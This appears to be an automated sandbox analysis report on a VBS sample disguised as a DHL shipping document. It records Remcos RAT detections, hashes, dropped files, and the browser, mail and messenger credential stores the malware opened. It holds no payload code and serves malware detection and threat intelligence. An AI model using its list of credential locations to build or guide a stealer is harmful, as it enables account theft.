Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B22264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

10_2_22B22264

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 21_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

21_2_004082CD

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_0041739B GetVersionExW,

19_2_0041739B

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: ESMTPPassword	21_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	21_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	21_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wab.exe PID: 1792, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Windows Analysis Report
DHL Shipping Document Awb & BL.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1465419
Product:	CloudBasic
Start time:	16:18:11
Start date:	01.07.2024
Sample:	DHL Shipping Document Awb & BL.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	af8e905368962cfb4873c41a77b4515c
SHA1:	577337de5d106e6b11225be7c362f33a8d5c0831
SHA256:	bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json	JSON data	18BC6D34FABB00C1E30D98E8DAEC814A	D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54	862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	DD89E182EEC1B964E2EEFE5F8889DCD7	326A3754A1334C32056811411E0C5C96F8BFBBEE	383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F23953D4A58E404FCB67ADD0C45EB27A	2D75B5CACF2916C66E440F19F6B3B21DFD289340	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gslda24.jeh.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oogrjtkq.5mz.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdzewvb3.idp.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xk34jjgh.il5.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\bhvB999.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x93162959, page size 32768, DirtyShutdown, Windows version 10.0	75E89EFC73D96AADD28DE34D3835EBE8	3795F9B5071AF7C56911E3C123B5F97215A6F363	F507DA6A39332803AF242E5CF3455B3A22A516C430D0FF1906F19128EFAEE3F0
C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs	data	66442CCD48F759B031F9B823384E55BC	B23D081BDC9686E199BCD24AECCD77CCF4550DC6	8705236D12F3890C431EEF683356787B711351E8B302A2CC1FD333ECD8198355
C:\Users\user\AppData\Local\Temp\ycflhgp	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Roaming\Proskriberes.Bet	ASCII text, with very long lines (65536), with no line terminators	710644F1295D73AF29B91F191549635E	DA74950F94B693C273E3E3F95ED6366AA68A93F0	5595275FB9355E5017A7033452DB54826C0EF829573B16EAF4E30E32473B903B
C:\Users\user\AppData\Roaming\kpburtts.dat	data	C2861AF443539E4BF998B7514A4634DD	C4B19C57E22BBF9E583DCA263B31E4B6FDF31899	05883416D8B9B7FBAFB4950ABA92DDED042188A77BF4510B56BEA9C62B5E06F8

Windows Analysis Report DHL Shipping Document Awb & BL.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
DHL Shipping Document Awb & BL.vbs

Malware Threat Intel
Provided by